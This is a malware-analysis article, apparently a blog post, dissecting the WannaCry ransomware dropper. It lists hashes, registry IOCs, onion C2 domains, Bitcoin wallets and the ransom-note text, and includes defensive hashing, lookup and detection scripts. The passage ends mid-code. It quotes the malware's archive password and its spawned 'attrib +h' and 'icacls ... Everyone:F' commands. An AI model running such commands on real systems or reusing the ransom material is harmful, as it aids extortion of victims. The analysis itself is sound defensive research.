In-depth analysis of WannaCry series (Part 1)

Mahmoud NourEldin
39 min read · May 10, 2023


After I got a lot of shares on my last article, the Emotet full code analysis, I decided to analyze the WannaCry ransomware in detail as well. My articles are not the same as the ones published by others: they focus on the details that help malware analysts, threat researchers and SOC teams improve their level, and they are also for anyone who wants to know how WannaCry works.

Introduction:

WannaCry is an example of crypto ransomware, a type of malicious software (malware) used by cybercriminals to extort money.

The WannaCry ransomware attack was a global epidemic that took place in May 2017.

This ransomware attack spread through computers operating Microsoft Windows. User’s files were held hostage, and a Bitcoin ransom was demanded for their return.

The cybercriminals responsible for the attack took advantage of a weakness in the Microsoft Windows operating system using a hack that was allegedly developed by the United States National Security Agency.

Known as EternalBlue, this hack was made public by a group of hackers called the Shadow Brokers before the WannaCry attack.

This introduction was written by Kaspersky.

In this article, we dive into the details of the WannaCry attack, analyzing its origins, methods, and impact. Part 1 focuses on the initial infection vector and the technical details of the malware used by analyzing the droppers only without the decryption process. Through this analysis, readers can gain a deeper understanding of the WannaCry attack and the lessons that can be learned from it to prevent future attacks.

We will also get the full picture of WannaCry, In Sha’ Allah, and see how much detail there can be in a dropper.

Glory be to Allah and praise be to Him; glory be to Allah the Almighty.

Where did I get this file?

On the Malware Trends page of the any.run website, we can see the top malware for a week, a month or a year, and the global rank.

Then, for any family you choose, you can see its rank and the last files submitted, which I downloaded.

Also, I chose this ransomware because I faced it in 2020 while I worked as a Threat Researcher. That’s why I chose it and not RedLine.

There is no god but Allah.

AV can’t detect!!

I downloaded the compressed file: 80239619c4ca44380c6269873a5b6b695585ccfcf278e0f2c72698658a3a6fd8

As we can see, only Fortinet detected it as WannaCryptor. Only 2 vendors detected it at first, and now it is 6 vendors.

This file dropped an executable file called:

Proforma Invoice and Bank swift-REG.PI-0086547654.exe

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

As we can see from its name, he used social engineering with an invoice lure to get it run.

It was detected by 61 vendors; only 7 vendors did not detect it [ Malwarebytes is one of them ] and 5 could not process it.

Static Malware Analysis:

File Name: diskpart.exe

md5: 0E14014289C29078069237196BD3EA72
sha1: 466A736F7F6987B34CD7A130E26A8AF13D3CF76C
sha256: F8CBC0DDB17A85F2BA099416961EFEF915F8EBA926681DF7CD2C1FA69F3C2B6A
file-type,dynamic-link library
FileDescription,DiskPart
FileVersion,6.1.7601.17514 (win7sp1_rtm.101119-1850)

— — — — — →[| CAN BE FAKE |]← — — — —

***The version number “6.1.7601.17514” is for Windows 7 Service Pack 1 (SP1) with build number “7601”. The numbers “6.1” indicate the major and minor version numbers of Windows 7, while “7601” represents the build number. The last set of numbers, “17514”, is the file version number, which identifies the specific build and version of the file.

The “(win7sp1_rtm.101119-1850)” at the end of the version number is a more detailed identifier that indicates the operating system version, service pack number, and the date and time of the build. “win7sp1” means it is Windows 7 with Service Pack 1, “rtm” stands for “release to manufacturing,” indicating it is a final, fully tested version, and “101119-1850” indicates the build date and time (November 19, 2010, at 18:50).***

LegalCopyright,© Microsoft Corporation. All rights reserved.
ProductName,Microsoft® Windows® Operating System

We can see here that he uses this version info to make the file look like a usual program [ Trojan ], and all of this exists in the resource:

It’s a GUI program

compiler-stamp,0x4CE78F41 (Sat Nov 20 01:05:05 2010 UTC)

Analyze the 2nd Stage

He gets a random string from the infected machine name:

figure 1

And he checks if the command line includes the “/i” argument:

figure 2
figure 3

Let’s see what he does the first time:

He takes the directory from which the malware runs and then calls a function that creates a registry key.

figure 4

He creates a registry key called “Software\WanaCrypt0r” in HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER with the value “wd”, which holds the path of the directory where the malware is executed.

Now, the first IOC is:

HKEY_LOCAL_MACHINE\Software\WanaCrypt0r

HKEY_CURRENT_USER\Software\WanaCrypt0r

figure 5
figure 6: the values of the stack before setting the value to the registry key
figure 7: the values that WannaCry put in the HKEY_CU registry key

Then he sets up persistence; let’s see it in detail:

figure 8

He puts the string “WNcry@2ol7” and then calls the resource function which I called:

It takes the resource name “80A” (“2058” in decimal) and its type “XIA”, which is not a commonly used type, and then calls a function:

figure 9

Analyzing the dropped files:

Let’s open it with the Resource Hacker tool. It’s a compressed resource whose format is “PK”; let’s save it and then uncompress it:

figure 10

I’m using “7-ZIP” for compressed files; let’s extract it:

figure 11

He needs a password :O

figure 12

Let’s try “WNcry@2ol7”, which was passed as an argument to the function:

figure 13

It works, and extracts a lot of files:

b.wnry, c.wnry, r.wnry, s.wnry, t.wnry, taskdl.exe, taskse.exe, u.wnry, and msg folder which includes a lot of files related to languages

figure 14
figure 15
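A resource that starts with “PK” can be inventoried before any password is known, because traditional ZIP encryption protects the file data but not the file names. The parser below is an added example, not code from the article: it walks the ZIP local file headers of a carved blob and reports each entry's name, size and encryption flag. The sample blobs are constructed in the code and only reuse file names listed above.

```python
import struct

LOCAL_SIG = b"PK\x03\x04"
# 30-byte local file header, little-endian: signature, version needed, flags,
# method, mod time, mod date, CRC-32, compressed size, uncompressed size,
# file-name length, extra-field length.
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")
FLAG_ENCRYPTED = 0x0001        # bit 0: entry data is encrypted
FLAG_DATA_DESCRIPTOR = 0x0008  # bit 3: real sizes are stored after the data
METHODS = {0: "stored", 8: "deflate", 99: "aes"}


def triage_zip_resource(blob):
    """Inventory a carved ZIP blob from its local file headers only.

    Works on truncated blobs too, since it never needs the central directory
    at the end of the archive. Returns a list of dicts, one per entry.
    """
    entries = []
    pos = 0
    while pos + LOCAL_HDR.size <= len(blob) and blob[pos:pos + 4] == LOCAL_SIG:
        (_sig, _ver, flags, method, _time, _date, _crc,
         csize, usize, name_len, extra_len) = LOCAL_HDR.unpack_from(blob, pos)
        name_start = pos + LOCAL_HDR.size
        name = blob[name_start:name_start + name_len].decode("cp437", "replace")
        entries.append({
            "name": name,
            "encrypted": bool(flags & FLAG_ENCRYPTED),
            "method": METHODS.get(method, f"unknown({method})"),
            "size": usize,
        })
        if flags & FLAG_DATA_DESCRIPTOR:
            break  # sizes are not in this header, so the next one cannot be located
        pos = name_start + name_len + extra_len + csize
    return entries


def needs_password(blob):
    """True if any entry in the blob has the encryption flag set."""
    return any(entry["encrypted"] for entry in triage_zip_resource(blob))


def constructed_entry(name, data, encrypted):
    """Build one stored entry for the samples below (constructed, not malware data)."""
    raw_name = name.encode("cp437")
    # Traditional ZIP encryption prepends a 12-byte header to the data;
    # zero bytes stand in for it here.
    body = b"\x00" * 12 + data if encrypted else data
    flags = FLAG_ENCRYPTED if encrypted else 0
    header = LOCAL_HDR.pack(LOCAL_SIG, 20, flags, 0, 0, 0, 0,
                            len(body), len(data), len(raw_name), 0)
    return header + raw_name + body


# Constructed samples: file names come from the article, contents are filler.
SAMPLE_LOCKED = b"".join(
    constructed_entry(name, b"x" * size, True)
    for name, size in [("b.wnry", 40), ("c.wnry", 16),
                       ("msg/m_english.wnry", 24), ("taskdl.exe", 32)]
)
SAMPLE_PLAIN = constructed_entry("readme.txt", b"hello", False)

if __name__ == "__main__":
    for entry in triage_zip_resource(SAMPLE_LOCKED):
        print(entry)
    print("password needed:", needs_password(SAMPLE_LOCKED))
```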

Let’s take the hashes of all of these files with the HashMyFiles tool:

figure 16

But it takes time to collect all this data, so let’s write a Python script for it:

import os
import hashlib
from datetime import datetime

# Replace with the directory you want to scan
directory = 'C:\\Users\\User\\Desktop\\WannaCry'

# Replace with the path and filename where you want to save the output
output_file = 'C:\\Users\\User\\Desktop\\WannaCry\\output.txt'

# Open the output file for writing
with open(output_file, 'w') as f:

    # Walk through the directory tree and process each file
    for root, dirs, files in os.walk(directory):
        for filename in files:
            filepath = os.path.join(root, filename)

            # Skip the report itself, which lives inside the scanned directory
            if os.path.abspath(filepath) == os.path.abspath(output_file):
                continue

            # Get file metadata (on Windows, st_ctime is the creation time)
            file_stats = os.stat(filepath)
            file_size = file_stats.st_size
            file_modified = datetime.fromtimestamp(file_stats.st_mtime).strftime('%Y-%m-%d %H:%M:%S')
            file_created = datetime.fromtimestamp(file_stats.st_ctime).strftime('%Y-%m-%d %H:%M:%S')

            # Calculate the SHA1 hash
            sha1_hash = hashlib.sha1()
            with open(filepath, 'rb') as f2:
                while True:
                    data = f2.read(1024)
                    if not data:
                        break
                    sha1_hash.update(data)
            sha1_hash = sha1_hash.hexdigest()

            # Write the output to the file
            output_line = f"{filename}\t{sha1_hash}\t{file_modified}\t{file_created}\t{file_size}\n"
            f.write(output_line)

And here is the output. The created date is 2017-04-27 and the modified date is 2017-05-11, which helps us know the beginning of the threat:

Name  File sha1 hash                           Modified Date       Created Date        File Size

b.wnry f19eceda82973239a1fdc5826bce7691e5dcb4fb 2017-05-11 04:13:18 2017-04-27 01:25:34 1440054
c.wnry f6b08523b1a836e2112875398ffefffde98ad3ca 2017-05-11 04:11:57 2017-05-10 09:16:21 780
r.wnry c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade 2017-05-10 23:59:13 2017-04-27 01:25:34 864
s.wnry d1af27518d455d432b62d73c6a1497d032f6120e 2017-05-09 00:58:43 2017-05-11 10:22:55 3038286
t.wnry 7b10aaeee05e7a1efb43d9f837e9356ad55c07dd 2017-05-11 10:22:55 2017-05-11 10:22:55 65816
taskdl.exe 47a9ad4125b6bd7c55e4e7da251e23f089407b8f 2017-05-11 10:22:55 2017-05-11 10:22:55 20480
taskse.exe be5d6279874da315e3080b06083757aad9b32c23 2017-05-11 10:22:55 2017-05-11 10:22:55 20480
u.wnry 45356a9dd616ed7161a3b9192e2f318d0ab5ad10 2017-05-11 10:22:55 2017-05-11 10:22:55 245760
m_bulgarian.wnry 81e427d15a1a826b93e91c3d2fa65221c8ca9cff 2010-11-19 11:16:58 2013-04-27 19:13:46 47879
m_chinese (simplified).wnry 5c14551d2736eef3a1c1970cc492206e531703c1 2010-11-19 11:16:58 2013-04-27 19:13:46 54359
m_chinese (traditional).wnry 52c07f98870eabace6ec370b7eb562751e8067e9 2010-11-19 11:16:58 2013-04-27 19:13:46 79346
m_croatian.wnry e325988f68d327743926ea317abb9882f347fa73 2010-11-19 11:16:58 2013-04-27 19:13:46 39070
m_czech.wnry 3609456e16bc16ba447979f3aa69221290ec17d0 2010-11-19 11:16:58 2013-04-27 19:13:46 40512
m_danish.wnry b548b45da8463e17199daafd34c23591f94e82cd 2010-11-19 11:16:58 2013-04-27 19:13:46 37045
m_dutch.wnry d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b 2010-11-19 11:16:58 2013-04-27 19:13:46 36987
m_english.wnry 6c6e49949957215aa2f3dfb72207d249adf36283 2010-11-19 11:16:58 2013-04-27 19:13:46 36973
m_filipino.wnry 2da1025bbbfb3cd308070765fc0893a48e5a85fa 2010-11-19 11:16:58 2013-04-27 19:13:46 37580
m_finnish.wnry e354d1cc43d6a39d9732adea5d3b0f57284255d2 2010-11-19 11:16:58 2013-04-27 19:13:46 38377
m_french.wnry 0fccbc91f0f94453d91670c6794f71348711061d 2010-11-19 11:16:58 2013-04-27 19:13:46 38437
m_german.wnry 26781d4b06ff704800b463d0f1fca3afd923a9fe 2010-11-19 11:16:58 2013-04-27 19:13:46 37181
m_greek.wnry 1088c7653cba385fe994e9ae34a6595898f20aeb 2010-11-19 11:16:58 2013-04-27 19:13:46 49044
m_indonesian.wnry eb3b87f7f654b604daf3484da9e02ca6c4ea98b7 2010-11-19 11:16:58 2013-04-27 19:13:46 37196
m_italian.wnry c4b1b3c087bd12b063e98bca464cd05f3f7b7882 2010-11-19 11:16:58 2013-04-27 19:13:46 36883
m_japanese.wnry 51eb7a254a33d05edf188ded653005dc82de8a46 2010-11-19 11:16:58 2013-04-27 19:13:46 81844
m_korean.wnry d636daf64d524f81367ea92fdafa3726c909bee1 2010-11-19 11:16:58 2013-04-27 19:13:46 91501
m_latvian.wnry fbea4f170507cde02b839527ef50b7ec74b4821f 2010-11-19 11:16:58 2013-04-27 19:13:46 41169
m_norwegian.wnry 75ad3b1ad4fb14813882d88e952208c648f1fd18 2010-11-19 11:16:58 2013-04-27 19:13:46 37577
m_polish.wnry 3d9f56d2381b8fe16042aa7c4feb1b33f2baebff 2010-11-19 11:16:58 2013-04-27 19:13:46 39896
m_portuguese.wnry ca915fbe020caa88dd776d89632d7866f660fc7a 2010-11-19 11:16:58 2013-04-27 19:13:46 37917
m_romanian.wnry e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d 2010-11-19 11:16:58 2013-04-27 19:13:46 52161
m_russian.wnry 442e31f6556b3d7de6eb85fbac3d2957b7f5eac6 2010-11-19 11:16:58 2013-04-27 19:13:46 47108
m_slovak.wnry fee0fd58b8efe76077620d8abc7500dbfef7c5b0 2010-11-19 11:16:58 2013-04-27 19:13:46 41391
m_spanish.wnry 2091e42fc17a0cc2f235650f7aad87abf8ba22c2 2010-11-19 11:16:58 2013-04-27 19:13:46 37381
m_swedish.wnry 06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae 2010-11-19 11:16:58 2013-04-27 19:13:46 38483
m_turkish.wnry cc56978681bd546fd82d87926b5d9905c92a5803 2010-11-19 11:16:58 2013-04-27 19:13:46 42582
m_vietnamese.wnry 2e4791f9cdfca8abf345d606f313d22b36c46b92 2010-11-19 11:16:58 2013-04-27 19:13:46 93778

here are the hashes:

import hashlib
import os

directory_path = "C:\\Users\\User\\Desktop\\WannaCry"  # change this to the path of the directory you want to hash files in

for filename in os.listdir(directory_path):
    filepath = os.path.join(directory_path, filename)
    if os.path.isfile(filepath):
        with open(filepath, "rb") as f:
            file_hash = hashlib.sha1()
            while chunk := f.read(8192):
                file_hash.update(chunk)
        print(f"{filename}: {file_hash.hexdigest()}")  # you can remove the file name


And here is a script for searching all these hashes on VirusTotal:

import hashlib
import os
import requests

# Enter your VirusTotal API key here
API_KEY = 'your_api_key_here'

# Function to calculate SHA1 hash of a file
def sha1_checksum(filename):
    with open(filename, 'rb') as f:
        sha1 = hashlib.sha1()
        while True:
            data = f.read(8192)
            if not data:
                break
            sha1.update(data)
    return sha1.hexdigest()

# Function to search for file hash on VirusTotal
def search_virustotal(file_hash):
    url = 'https://www.virustotal.com/vtapi/v2/file/report'
    params = {'apikey': API_KEY, 'resource': file_hash}
    response = requests.get(url, params=params, timeout=30)
    if response.status_code == 200:
        json_response = response.json()
        if json_response['response_code'] == 1:
            return json_response['positives'], json_response['total']
    return None, None

# Enter the directory path containing the files to investigate
dir_path = '/path/to/directory'

# Iterate over all files in the directory
for filename in os.listdir(dir_path):
    file_path = os.path.join(dir_path, filename)
    # Skip sub-directories (such as the msg folder), which cannot be opened as files
    if not os.path.isfile(file_path):
        continue
    # Calculate SHA1 hash of the file
    file_hash = sha1_checksum(file_path)
    # Search for file hash on VirusTotal
    positives, total = search_virustotal(file_hash)
    if positives is not None and total is not None:
        print(f"{filename}: {positives}/{total} vendors detected the file as malicious on VirusTotal.")
    else:
        print(f"Could not retrieve data for {filename} from VirusTotal.")

c.wnry

After opening the c.wnry file, I found the C2 servers, which are onion websites, and the link for the Tor browser:

figure 17

WannaCry C2 server:

gx7ekbenv2riucmf[.]onion

57g7spgrzlojinas[.]onion

xxlvbrloxvriy2c5[.]onion

76jdd2ir2embyv47[.]onion

cwwnhwhlz52maqm7[.]onion

It also includes the link for downloading TOR Browser version 6.5.1 to communicate with these Dark Web domains:

https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10[.]zip

This helps us in network analysis to detect which machines connected to these onion domains or to the TOR download URL.

u.wnry

It’s a 32-bit GUI executable file compiled at (Mon Jul 13 16:19:35 2009 UTC)

file-size, 245760 (bytes)
signature, Microsoft Visual C++ v6.0
file-version, 6.1.7600.16385 (win7_rtm.090713-1255)
description, Load PerfMon Counters

md5,7BF2B57F2A205768755C07F238FB32CC
sha1,45356A9DD616ED7161A3B9192E2F318D0AB5AD10
sha256,B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25

figure 18

It has a lot of resources under the name “Wana Decryptor”:

102 DIALOGEX 0, 0, 540, 360
STYLE DS_SETFONT | DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
EXSTYLE WS_EX_APPWINDOW
CAPTION "Wana Decryptor"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
FONT 8, "MS Sans Serif"
{
CONTROL "Check &Payment", 1004, BUTTON, BS_PUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 160, 336, 180, 19
CONTROL "&Decrypt", 1003, BUTTON, BS_PUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 360, 336, 180, 19
CONTROL "", 1000, "RICHEDIT", ES_LEFT | ES_MULTILINE | ES_AUTOVSCROLL | ES_READONLY | ES_WANTRETURN | WS_CHILD | WS_VISIBLE | WS_BORDER | WS_VSCROLL | WS_TABSTOP, 160, 26, 380, 251 , WS_EX_CLIENTEDGE
CONTROL "", 1007, EDIT, ES_LEFT | ES_AUTOHSCROLL | ES_READONLY | WS_CHILD | WS_VISIBLE | WS_BORDER | WS_TABSTOP, 257, 304, 254, 19
CONTROL "Copy", 1009, BUTTON, BS_PUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 513, 302, 22, 22
CONTROL "QR Code", 1017, STATIC, SS_LEFT | WS_CHILD | WS_GROUP, 508, 287, 29, 12
CONTROL "About bitcoin", 1013, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 18, 298, 119, 10
CONTROL "How to buy bitcoins?", 1010, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 18, 316, 119, 10
CONTROL "Contact Us", 1006, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 18, 334, 119, 10
CONTROL "Ooops, your files have been encrypted!", 1005, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 160, 3, 302, 19 , WS_EX_TRANSPARENT
CONTROL 136, 1014, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE, 35, 5, 87, 82 , WS_EX_DLGMODALFRAME
CONTROL 135, 1016, STATIC, SS_BITMAP | SS_SUNKEN | WS_CHILD | WS_VISIBLE, 160, 288, 91, 33
CONTROL "Your files will be lost on", 1019, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 16, 196, 126, 11
CONTROL "1/1/2017 00:00:00", 1020, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 11, 215, 124, 11
CONTROL "00:00:00:00", 1021, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 15, 251, 121, 21
CONTROL "Progress1", 1012, "msctls_progress32", PBS_SMOOTH | PBS_VERTICAL | WS_CHILD | WS_VISIBLE | WS_BORDER, 141, 210, 11, 56
CONTROL "Time Left", 1018, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 34, 235, 80, 11
CONTROL "", -1, BUTTON, BS_GROUPBOX | WS_CHILD | WS_VISIBLE, 6, 184, 149, 93
CONTROL "Payment will be raised on", 1022, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 10, 100, 140, 11
CONTROL "1/1/2017 00:00:00", 1023, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 11, 118, 124, 11
CONTROL "00:00:00:00", 1025, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 15, 155, 121, 21
CONTROL "Progress1", 1011, "msctls_progress32", PBS_SMOOTH | PBS_VERTICAL | WS_CHILD | WS_VISIBLE | WS_BORDER, 141, 114, 11, 56
CONTROL "Time Left", 1024, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 34, 140, 80, 11
CONTROL "", -1, BUTTON, BS_GROUPBOX | WS_CHILD | WS_VISIBLE, 6, 88, 149, 93
CONTROL "Send $300 worth of bitcoin to this address:", 1026, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 257, 286, 277, 15
CONTROL "", -1, BUTTON, BS_GROUPBOX | WS_CHILD | WS_VISIBLE, 160, 278, 379, 51
CONTROL "", 1039, COMBOBOX, CBS_DROPDOWNLIST | WS_CHILD | WS_VISIBLE | WS_VSCROLL | WS_TABSTOP, 466, 7, 73, 149
}
figure 19

And for decrypting:

figure 20

checking your payment:

figure 21

Login with Domain/User and Password:

figure 22
[ Version Info ]

1 VERSIONINFO
FILEVERSION 6,1,7600,16385
PRODUCTVERSION 6,1,7600,16385
FILEOS 0x40004
FILETYPE 0x1
{
BLOCK "StringFileInfo"
{
BLOCK "040904B0"
{
VALUE "CompanyName", "Microsoft Corporation"
VALUE "FileDescription", "Load PerfMon Counters"
VALUE "FileVersion", "6.1.7600.16385 (win7_rtm.090713-1255)"
VALUE "InternalName", "LODCTR.EXE"
VALUE "LegalCopyright", "\xA9 Microsoft Corporation. All rights reserved."
VALUE "OriginalFilename", "LODCTR.EXE"
VALUE "ProductName", "Microsoft\xAE Windows\xAE Operating System"
VALUE "ProductVersion", "6.1.7600.16385"
}
}

BLOCK "VarFileInfo"
{
VALUE "Translation", 0x0409 0x04B0
}
}

[ Manifest ]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"
manifestVersion="1.0">
<assemblyIdentity
name="Hola"
version="1.0.0.1"
processorArchitecture="X86"
type="win32"
/>
<description>Hola</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="X86"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>

So this file is another big dropped executable; we will analyze it later.

t.wnry

It is a WANACRY encoded file.

figure 23

s.wnry

It is a compressed file whose format begins with “PK”; let’s decompress it:

figure 24

It extracts the Tor program:

figure 25

r.wnry

It is the message file shown to you after encryption:

Q:  What's wrong with my files?

A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!

Q: What do I do?

A: First, you need to pay service fees for the decryption.
Please send %s to this bitcoin address: %s

Next, please find an application file named "%s". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)

Q: How can I trust?

A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.

* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
figure 26

b.wnry

It is in the BM6 file format, which may be for audio:

figure 27

taskdl.exe

It’s a SQL Client Configuration Utility EXE. [ NOT malware ]

But it may be fake; we want to know why he is using it. [ Yes, after analyzing it we saw it’s a deletion program; details below ]

figure 28: taken from GOOGLE

md5,4FEF5E34143E646DBF9907C4374276F5
sha1,47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
sha256,4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
file-size,20480 (bytes)
imphash,818097ACF11D6A2AC55031896B50D98C
signature,Microsoft Visual C++ v6.0
file-version,6.1.7600.16385 (win7_rtm.090713-1255)
description,SQL Client Configuration Utility EXE
file-type,executable
cpu,32-bit
subsystem,GUI
compiler-stamp,0x4A5BCD57 (Mon Jul 13 17:12:07 2009 UTC)

figure 29

taskse.exe

It’s used for communication. [ We will find out later ]

[ The same here: after analyzing it, we saw it’s @WannaCryDecryptor@.exe; details below ].

md5,8495400F199AC77853C53B5A3F278F3E
sha1,BE5D6279874DA315E3080B06083757AAD9B32C23
sha256,2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
file-size,20480 (bytes)
imphash,A89F8E8FE712C2F1D82DFF25307D18C6
signature,Microsoft Visual C++ v6.0
file-version,6.1.7600.16385 (win7_rtm.090713-1255)
description,waitfor - wait/send a signal over a network
file-type,executable
cpu,32-bit
subsystem,GUI
compiler-stamp,0x4A5BC010 (Mon Jul 13 16:15:28 2009 UTC)

figure 30

We will come back to all of these files for analysis later, after learning what the main executable file can do.

Let’s continue. After calling the resource APIs, he calls a lot of subroutines related to resources, and then he creates these files one by one.

CreateFileA("%currentDirectory%/b.wnry", 
GENERIC_WRITE, NULL, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_ARCHIVE );
figure 33

And then he writes a buffer to the file:

figure 34

OK, we know all of these files, so let’s skip this.

From now on we need to improve our writing and analyze only the important things, so we will skip the minor details.

Let’s see the Bitcoin function:

figure 45

He copies the addresses of the Bitcoin wallets and the C2 servers, which we listed earlier, to a memory region.

figure 46

and here is the copying function:

figure 47

And here are the Bitcoin addresses with the onion websites:

figure 48

BITCOIN Wallet Addresses:

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

figure 49

From the URLs which I provided with the Bitcoin wallets, you can see how many bitcoins each address received.
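Both the c.wnry contents and the memory region shown above hold onion hosts and wallet strings as plain text, so they can be pulled out of a file or memory dump automatically. The extractor below is an added example, not code from the article: it finds v2 onion host names and Bitcoin P2PKH candidates in a byte buffer and keeps a wallet only if its Base58Check checksum verifies, which removes look-alike strings. The sample buffer is constructed (NUL-separated fields are an assumption about layout) and reuses indicators printed in the article plus one generated test address.

```python
import hashlib
import re

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
ONION_V2 = re.compile(r"\b[a-z2-7]{16}\.onion\b")       # 16 base32 chars
P2PKH = re.compile(r"\b1[1-9A-HJ-NP-Za-km-z]{25,33}\b")  # legacy "1..." addresses


def sha256d(data):
    """Double SHA-256, as used for the Base58Check checksum."""
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def b58decode(text):
    n = 0
    for ch in text:
        n = n * 58 + B58.index(ch)  # ValueError on a non-Base58 character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    # Each leading '1' encodes one leading zero byte.
    return b"\x00" * (len(text) - len(text.lstrip("1"))) + body


def b58encode(raw):
    n, out = int.from_bytes(raw, "big"), ""
    while n:
        n, rem = divmod(n, 58)
        out = B58[rem] + out
    return "1" * (len(raw) - len(raw.lstrip(b"\x00"))) + out


def is_p2pkh(address):
    """True if it decodes to version 0x00 + 20-byte hash + a valid 4-byte checksum."""
    try:
        raw = b58decode(address)
    except ValueError:
        return False
    return len(raw) == 25 and raw[0] == 0 and sha256d(raw[:21])[:4] == raw[21:]


def extract_iocs(blob):
    """Return defanged onion hosts and checksum-verified wallets found in blob."""
    text = blob.decode("latin-1")  # 1:1 byte mapping, never fails
    onions = sorted(set(ONION_V2.findall(text)))
    wallets = sorted({m for m in P2PKH.findall(text) if is_p2pkh(m)})
    return {"onion": [o.replace(".onion", "[.]onion") for o in onions],
            "btc": wallets}


# Indicators as printed in the article (refanged only to build the sample).
PAGE_ONIONS = ["gx7ekbenv2riucmf[.]onion", "57g7spgrzlojinas[.]onion"]
PAGE_WALLETS = ["13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94",
                "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw",
                "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"]

# A generated test address with a correct checksum, and a one-character typo of it.
_payload = b"\x00" + bytes(range(1, 21))
CONSTRUCTED_WALLET = b58encode(_payload + sha256d(_payload)[:4])
_last = CONSTRUCTED_WALLET[-1]
MISTYPED_WALLET = CONSTRUCTED_WALLET[:-1] + B58[(B58.index(_last) + 1) % 58]

# Constructed buffer: every string separated by NUL bytes.
SAMPLE = b"\x00\x00".join(
    s.encode() for s in
    [o.replace("[.]", ".") for o in PAGE_ONIONS]
    + PAGE_WALLETS + [CONSTRUCTED_WALLET, MISTYPED_WALLET, "not-an-indicator"]
)

if __name__ == "__main__":
    print(extract_iocs(SAMPLE))
```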

And then he creates a process with “attrib +h .”:

figure 50

The command “attrib +h .” is used to hide all files and folders in the current directory by setting their “hidden” attribute.

figure 51

And then he creates another process with the command line “icacls . /grant Everyone:F /T /C /Q”:

figure 52

This command is used to grant the “Full Control” permission to the “Everyone” group on all files and subdirectories in the current directory and its subdirectories (/T option). The /C option continues to process even if there are errors, and the /Q option suppresses the display of success messages.

The icacls command is a Windows command-line utility that is used to manage file and folder permissions. The /grant option is used to grant permissions to a user or group, and the Everyone keyword is a special identity that represents all users and groups in the system.
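The two child processes described above make a compact behavioural detection: one parent that runs both `attrib +h .` and `icacls . /grant Everyone:F /T` within a short time. The rule below is an added example, not code from the article, run over constructed process-creation events. The field names (`time`, `parent_guid`, `parent_image`, `command_line`) and the 60-second window are assumptions, to be mapped onto whatever your EDR or Sysmon pipeline provides.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumption: both children start within a minute
TOOLS = {"attrib", "icacls"}


def argv(command_line):
    """Split a Windows command line into lower-case tokens, honouring quotes."""
    return [t.strip('"').lower() for t in re.findall(r'"[^"]*"|\S+', command_line)]


def tool_name(token):
    """Reduce a path such as c:/windows/system32/icacls.exe to 'icacls'."""
    name = token.replace("/", "\\").rsplit("\\", 1)[-1]
    return name[:-4] if name.endswith(".exe") else name


def classify(command_line):
    """Return 'hide_cwd', 'open_acl_cwd' or None for one command line."""
    args = argv(command_line)
    # Find the tool anywhere in the line so that "cmd /c attrib ..." also matches.
    start = next((i for i, a in enumerate(args) if tool_name(a) in TOOLS), None)
    if start is None:
        return None
    tool, rest = tool_name(args[start]), args[start + 1:]
    if tool == "attrib":
        return "hide_cwd" if "+h" in rest and "." in rest else None
    # icacls: the target must be ".", applied recursively, granting Everyone full control.
    if rest[:1] != ["."] or "/grant" not in rest or "/t" not in rest:
        return None
    after_grant = rest[rest.index("/grant") + 1:]
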